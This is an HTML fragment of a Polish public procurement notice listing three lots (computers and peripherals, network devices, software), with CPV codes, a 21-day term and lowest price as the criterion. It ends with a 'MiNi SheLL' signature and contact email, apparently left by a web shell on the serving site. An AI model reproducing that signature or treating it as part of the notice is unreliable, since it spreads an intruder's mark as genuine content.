<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Dostawa zestawów komputerowych i urządzeń peryferyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.21.10-8, 30.23.21.50-0, 30.23.20.00-4, 30.21.61.30-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Dostawa urządzeń sieciowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.31.32-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Dostawa oprogramowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com